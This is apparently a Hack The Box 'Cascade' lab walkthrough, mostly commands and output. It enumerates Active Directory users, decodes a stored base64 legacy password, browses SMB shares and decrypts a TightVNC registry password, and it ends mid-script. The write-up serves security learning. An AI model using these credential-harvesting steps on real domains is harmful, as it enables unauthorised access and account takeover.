This is a Windows machine from Hack The Box.
Nmap scan
└─$ nmap -sV -sC -oA cascade 10.10.10.182
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:46 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.97 seconds
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ nmap -sV -sC -oA cascade 10.10.10.182 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:47 EDT
Nmap scan report for 10.10.10.182
Host is up (0.38s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-11 09:48:13Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.22 seconds
┌──(kali㉿kali)-[~/HTB/cascade]
└─$
crackmapexec
└─$ crackmapexec smb 10.10.10.182 -u "" up ""
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/HTB/cascade]
rpcclient
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB/cascade]
└─$
Add cascade.local to the hosts file:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
Do an LDAP search:
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
CascGuest
CASC-DC1$
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade>
Output the users to a text file and include administrator:
administrator
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade>
Use kerbrute to see which users are valid; it reports 12 of the 15 as valid.
kali@kali ~/H/cascade> ./kerbrute userenum --dc 10.10.10.182 -d cascade.LOCAL users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/11/23 - Ronnie Flathers @ropnop
2023/09/11 06:36:48 > Using KDC(s):
2023/09/11 06:36:48 > 10.10.10.182:88
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:36:57 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:03 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:03 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:04 > [+] VALID USERNAME: [email protected]
2023/09/11 06:37:04 > Done! Tested 15 usernames (12 valid) in 15.881 seconds
kali@kali ~/H/cascade>
We loop over this file and check which users we can get an AS-REP hash for, but we get nothing:
```bash
└─$ while read -r user; do
./GetNPUsers.py cascade.LOCAL/$user -no-pass -dc-ip 10.10.10.182
done < /home/kali/HTB/cascade/users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
```
enum4linux gives nothing:
kali@kali ~/H/cascade> enum4linux -S 10.10.10.182
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 11 06:45:06 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.182 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.10.182 )===================================
[+] Server 10.10.10.182 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.182 )================================
Domain Name: CASCADE
Domain Sid: S-1-5-21-3332504370-1206983947-1165150453
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.10.182 )=================================
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.182
enum4linux complete on Mon Sep 11 06:45:30 2023
kali@kali ~/H/cascade>
Tried this as well:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.182 -request 'cascade.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
No entries found!
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
We are going to try to brute force a password, so first we check the password policy:
└─$ crackmapexec smb 10.10.10.182 --pass-pol
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] Dumping password info for domain: CASCADE
SMB 10.10.10.182 445 CASC-DC1 Minimum password length: 5
SMB 10.10.10.182 445 CASC-DC1 Password history length: None
SMB 10.10.10.182 445 CASC-DC1 Maximum password age: Not Set
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Password Complexity Flags: 000000
SMB 10.10.10.182 445 CASC-DC1 Domain Refuse Password Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Store Cleartext: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Lockout Admins: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Clear Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Anon Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Complex: 0
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Minimum password age: None
SMB 10.10.10.182 445 CASC-DC1 Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Locked Account Duration: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Account Lockout Threshold: None
SMB 10.10.10.182 445 CASC-DC1 Forced Log off Time: Not Set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
The important line is "Account Lockout Threshold: None": there is no lockout policy. Brute forcing would still require us to create a short password list.
Going back to LDAP, list every attribute name in the directory and count how often it appears:
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
1109 dSCorePropagationData:
518 objectClass:
263 #
254
249 dn:
226 whenCreated:
226 whenChanged:
226 uSNCreated:
226 uSNChanged:
226 objectGUID::
226 objectCategory:
Near the bottom of the list there is a custom attribute called cascadeLegacyPwd:
1 C-DC1,OU=Domain
1 cascadeLegacyPwd:
Doing an ldapsearch to get the username together with this custom attribute:
kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName cascadeLegacyPwd | awk -F ': ' '/sAMAccountName/ { username=$2 } /cascadeLegacyPwd/ { print username ": " $2 }'
sAMAccountName cascadeLegacyPwd : sAMAccountName cascadeLegacyPwd
r.thompson: clk0bjVldmE=
kali@kali ~/H/cascade>
This looks like base64 because of the trailing =. Asking ChatGPT, it claimed the decoded value was clk4n5eva and gave the command `echo "clk0bjVldmE=" | base64 -d`; ChatGPT was wrong, as running the command shows:
kali@kali ~/H/cascade> echo "clk0bjVldmE=" | base64 -d
rY4n5eva⏎ kali@kali ~/H/cascade>
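The awk pipeline above also prints the `# requesting:` comment as if it were a user, and it would misread attributes that ldapsearch emits base64-wrapped with `::`. As an added example (not part of the original walkthrough), this Python script parses the LDIF properly, pairs each sAMAccountName with its cascadeLegacyPwd and base64-decodes the stored value; the LDIF sample and the DNs in it are constructed from the attribute names shown on the page.

```python
"""Pair sAMAccountName with cascadeLegacyPwd in ldapsearch (LDIF) output and
decode the base64 value, the way the Cascade walkthrough does by hand.
Added example; the sample LDIF below is constructed (DNs are made up)."""
import base64
import re
from typing import Dict, List

# Constructed sample of `ldapsearch -x ... '(objectClass=person)'
# sAMAccountName cascadeLegacyPwd` output. s.smith's displayName uses LDIF's
# `::` form, which ldapsearch emits for values it considers non-printable.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# requesting: sAMAccountName cascadeLegacyPwd
#

# Ryan Thompson, Users, cascade.local
dn: CN=Ryan Thompson,OU=Users,DC=cascade,DC=local
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith, Users, cascade.local
dn: CN=Steve Smith,OU=Users,DC=cascade,DC=local
sAMAccountName: s.smith
displayName:: U3RldmUgU21pdGg=

# search result
search: 2
result: 0 Success
"""

_ATTR_RE = re.compile(r"^([A-Za-z][\w.-]*)(::?) ?(.*)$")


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Split LDIF into entries, unfold continuation lines, decode `::` values."""
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    unfolded = re.sub(r"\n ", "", text)   # LDIF folds long values onto " " lines
    for line in unfolded.splitlines() + [""]:
        if not line.strip():               # a blank line ends the entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):           # ldapsearch comment lines
            continue
        m = _ATTR_RE.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":                    # LDIF base64 wrapper, not the data itself
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(name, []).append(value)
    return entries


def looks_like_base64(value: str) -> bool:
    """The heuristic used on the page: base64 alphabet, optional = padding, length % 4 == 0."""
    return bool(re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value)) and len(value) % 4 == 0


def legacy_passwords(text: str, attr: str = "cascadeLegacyPwd") -> Dict[str, str]:
    """Map sAMAccountName -> decoded value of `attr` for every account that carries it."""
    found: Dict[str, str] = {}
    for entry in parse_ldif(text):
        if "dn" not in entry or attr not in entry:
            continue
        user = entry.get("sAMAccountName", ["?"])[0]
        raw = entry[attr][0]
        if looks_like_base64(raw):
            try:
                raw = base64.b64decode(raw, validate=True).decode("utf-8")
            except ValueError:             # not really base64 (or not text): keep as stored
                pass
        found[user] = raw
    return found


if __name__ == "__main__":
    for user, value in legacy_passwords(SAMPLE_LDIF).items():
        print(f"{user}: {value}")
```

In an audit, run the same parser over the full export to list every account that still carries the legacy attribute.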
We try crackmapexec with both candidate passwords:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p clk4n5eva
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:clk4n5eva
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5eva
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
We connect to the Data share with smbclient and find some files:
└─$ smbclient //10.10.10.182/data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
cd
6553343 blocks of size 4096. 1624901 blocks available
smb: \> cd Contractors
smb: \Contractors\> ls
NT_STATUS_ACCESS_DENIED listing \Contractors\*
smb: \Contractors\> cd ../
smb: \> cd Finance
smb: \Finance\> ls
NT_STATUS_ACCESS_DENIED listing \Finance\*
smb: \Finance\> cd ../
smb: \> cd IT
smb: \IT\> ls
. D 0 Tue Jan 28 13:04:51 2020
.. D 0 Tue Jan 28 13:04:51 2020
Email Archives D 0 Tue Jan 28 13:00:30 2020
LogonAudit D 0 Tue Jan 28 13:04:40 2020
Logs D 0 Tue Jan 28 19:53:04 2020
Temp D 0 Tue Jan 28 17:06:59 2020
6553343 blocks of size 4096. 1624901 blocks available
smb: \IT\> get Email Archives
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Email
smb: \IT\> cd Email Archives
cd \IT\Email\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\> get LogonAudit
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \IT\LogonAudit
smb: \IT\> cd LogonAudit
smb: \IT\LogonAudit\> ls
. D 0 Tue Jan 28 13:04:40 2020
.. D 0 Tue Jan 28 13:04:40 2020
6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\LogonAudit\> cd ../
smb: \IT\> cd Logs
smb: \IT\Logs\> ls
. D 0 Tue Jan 28 19:53:04 2020
.. D 0 Tue Jan 28 19:53:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 11:33:45 2020
DCs D 0 Tue Jan 28 19:56:00 2020
6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\Logs\> cd Ark AD Recycle Bin
cd \IT\Logs\Ark\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Logs\> cd "Ark AD Recycle Bin"
smb: \IT\Logs\Ark AD Recycle Bin\> ls
. D 0 Fri Jan 10 11:33:45 2020
.. D 0 Fri Jan 10 11:33:45 2020
ArkAdRecycleBin.log A 1303 Tue Jan 28 20:19:11 2020
6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Logs\Ark AD Recycle Bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \IT\Logs\Ark AD Recycle Bin\> cd ../
smb: \IT\Logs\> cd ../
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
. D 0 Tue Jan 28 13:00:30 2020
.. D 0 Tue Jan 28 13:00:30 2020
Meeting_Notes_June_2018.html An 2522 Tue Jan 28 13:00:12 2020
6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.5 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \IT\Email Archives\>
Reading the content of the email:
└─$ cat Meeting_Notes_June_2018.html
<html>
<body lang=EN-GB link=blue vlink=purple style='tab-interval:36.0pt'>
<div class=WordSection1>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>From:<span style='mso-tab-count:
1'> </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Steve Smith
<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>To:<span style='mso-tab-count:
1'> </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>IT (Internal)<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Sent:<span style='mso-tab-count:
1'> </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>14 June 2018 14:07<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Subject:<span
style='mso-tab-count:1'> </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Meeting Notes<o:p></o:p></span></p>
<p><o:p> </o:p></p>
<p>For anyone that missed yesterday's meeting (I'm looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the 'Best GPO' competition will be
announced on Friday so get your submissions in soon.</p>
<p class=MsoNormal><o:p> </o:p></p>
<p class=MsoNormal>Steve</p>
</div>
</body>
</html>
We see the username TempAdmin. We try to get an AS-REP hash for it, but no luck; also tried with the user Ben:
kali@kali ~/H/cascade> cd /usr/share/doc/python3-impacket/examples
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/TempAdmin
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate TempAdmin, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/S.smith
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate S.smith, getting its TGT
[-] User S.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/Ben
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate Ben, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples>
We also look at the VNC file that we found in one of the folders:
smb: \> ls
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
cd
6553343 blocks of size 4096. 1624895 blocks available
smb: \> cd IT
smb: \IT\> ls
. D 0 Tue Jan 28 13:04:51 2020
.. D 0 Tue Jan 28 13:04:51 2020
Email Archives D 0 Tue Jan 28 13:00:30 2020
LogonAudit D 0 Tue Jan 28 13:04:40 2020
Logs D 0 Tue Jan 28 19:53:04 2020
Temp D 0 Tue Jan 28 17:06:59 2020
cd
6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\> cd Temp
smb: \IT\Temp\> ls
. D 0 Tue Jan 28 17:06:59 2020
.. D 0 Tue Jan 28 17:06:59 2020
r.thompson D 0 Tue Jan 28 17:06:53 2020
s.smith D 0 Tue Jan 28 15:00:01 2020
6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> ls
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\s.smith\> get VNC Install.reg
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \IT\Temp\s.smith\>
The VNC file:
└─$ cat VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
┌──(kali㉿kali)-[~/HTB/cascade]
└─$
ChatGPT gives the raw bytes as ASCII, kÏ*KnZÊ, which doesn't look like a password.
From ChatGPT:
The value you provided seems to be from a registry key associated with TightVNC. TightVNC stores its passwords in the Windows Registry, and they're saved in a hashed (obfuscated) form, not plain text.
Given `"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`, this looks like the registry entry for the TightVNC password. The hexadecimal value isn't the password itself but rather an encoded or hashed representation of it.
To get the actual password, you would typically need to decode or decrypt the hash, which requires specialized tools or scripts. There have been a few tools and scripts written for this purpose over the years. One of the well-known tools for this is `vncpwd`, which can decrypt VNC passwords stored in this way.
If you have access to the tool, you can use the extracted hex values to retrieve the password. Otherwise, there are also scripts available online in various programming languages that accomplish the same thing.
Keep in mind that interpreting or accessing information without proper authorization is illegal and unethical. Always make sure to have the necessary permissions when working with sensitive data or systems.
Got a decrypter: https://github.com/jeroennijhof/vncpwd
After running the tool on the hex as a text file, I was getting bad output:
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.txt
Password: (�����
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$
Checking with ChatGPT, it recommended converting the hex to raw bytes first:
echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin
./vncpwd vnc_hash.bin
And we get the password:
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.bin
Password: sT333ve2
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$
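The .reg export shows why a file like this on a readable share is a finding in itself: TightVNC keeps the password in the registry in a reversible form, not as a hash. As an added example (not code from the walkthrough or from TightVNC), this Python script parses the .reg format (string, dword and hex values) and audits the server settings shown above; the sample is constructed from the keys on the page.

```python
"""Parse a Windows .reg export and flag weak TightVNC server settings.
Added example; SAMPLE_REG is a constructed excerpt of the export above."""
import re
from typing import Callable, Dict, List, Tuple, Union

RegValue = Union[str, int, bytes]

# Constructed excerpt of "VNC Install.reg" (UTF-16 BOM already stripped).
SAMPLE_REG = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"UseVncAuthentication"=dword:00000001
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"EnableFileTransfers"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
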